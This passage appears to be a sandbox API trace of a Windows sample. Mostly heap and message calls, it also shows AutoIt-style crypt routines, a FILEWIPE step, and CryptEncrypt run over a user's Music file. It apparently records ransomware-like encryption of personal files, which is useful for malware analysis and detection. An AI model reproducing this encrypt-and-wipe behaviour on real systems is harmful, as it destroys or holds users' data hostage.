dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0188.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0188.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0188.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0188.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0188.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0188.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0188.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0188.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0188.358] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0188.358] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0188.358] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0188.358] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0188.358] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0188.358] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0188.358] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0188.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0188.358] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0188.358] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0188.358] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0188.358] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0188.358] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0188.358] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0188.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0188.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0188.358] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd498 [0188.358] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0188.359] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0188.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0188.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0188.359] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0188.359] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0188.359] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0188.359] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0188.359] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0188.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0188.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0188.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0188.359] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0188.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0188.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0188.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0188.359] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0188.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0188.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0188.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0188.359] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0188.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0188.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0188.359] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0188.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0188.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0188.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0188.360] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0188.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0188.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0188.360] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0188.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0188.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0188.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0188.360] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0188.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0188.360] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0188.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0188.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0188.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0188.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0188.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0188.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0188.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0188.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0188.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0188.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0188.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0188.361] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0188.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0188.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0188.361] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0188.361] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0188.361] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0188.361] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0188.361] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0188.361] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0188.361] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0188.361] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0188.361] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0188.361] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0188.361] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0188.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0188.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0188.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0188.362] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0188.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0188.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0188.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0188.362] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.362] CryptGetKeyParam (in: hKey=0x90af18, dwParam=0x7, pbData=0x9c27d8, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c27d8*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0188.362] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0188.362] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0188.362] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.362] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.362] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.362] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.362] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0188.362] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.362] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.362] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0188.381] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0188.381] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0188.381] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0188.381] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0188.381] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0188.382] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0188.382] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0188.382] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0188.382] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0188.382] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0188.382] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0188.382] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0188.382] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0188.382] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0188.382] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0188.382] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0188.382] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0188.382] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0188.382] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0188.382] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0188.382] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.382] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x4bb8, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x4bc0) returned 1 [0188.383] CharLowerBuffW (in: lpsz="byte[19393]", cchLength=0xb | out: lpsz="byte[19393]") returned 0xb [0188.383] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0188.383] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0188.383] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0188.383] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.383] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xbf3798*, pdwDataLen=0x87e820*=0x4bb8, dwBufLen=0x4bc0 | out: pbData=0xbf3798*, pdwDataLen=0x87e820*=0x4bc0) returned 1 [0188.383] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0188.383] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0188.383] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0188.383] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0188.384] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0188.384] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0188.384] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0188.384] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0188.384] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0188.386] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0188.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0188.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0188.386] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0188.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0188.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0188.386] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.386] CryptDestroyKey (hKey=0x90af18) returned 1 [0188.386] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0188.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0188.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0188.386] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0188.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0188.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0188.386] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0188.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0188.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0188.387] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0188.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0188.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0188.387] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0188.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0188.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0188.387] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0188.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0188.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0188.387] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0188.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0188.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0188.387] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0188.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0188.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0188.387] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.387] CryptReleaseContext (hProv=0x9c0b78, dwFlags=0x0) returned 1 [0188.387] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0188.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0188.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0188.387] FreeLibrary (hLibModule=0x74f20000) returned 1 [0188.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0188.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0188.391] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0188.391] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df190 | out: hHeap=0x8a0000) returned 1 [0188.391] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0188.391] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\xhgr3.mp3", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf6b94ad0, ftCreationTime.dwHighDateTime=0x1d5deab, ftLastAccessTime.dwLowDateTime=0x17c989e0, ftLastAccessTime.dwHighDateTime=0x1d5da3a, ftLastWriteTime.dwLowDateTime=0x17c989e0, ftLastWriteTime.dwHighDateTime=0x1d5da3a, nFileSizeHigh=0x0, nFileSizeLow=0x4bb8, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="xhgr3.mp3", cAlternateFileName="")) returned 0x90ae18 [0188.391] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0188.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0188.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0188.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0188.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0188.392] CharLowerBuffW (in: lpsz="byte[19384]", cchLength=0xb | out: lpsz="byte[19384]") returned 0xb [0188.392] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0188.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0188.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0188.392] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0188.392] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0188.393] FreeLibrary (hLibModule=0x75c90000) returned 1 [0188.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0188.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0188.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0188.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0188.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0188.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0188.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0188.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0188.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0188.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0188.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0188.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0188.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0188.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0188.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0188.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0188.393] 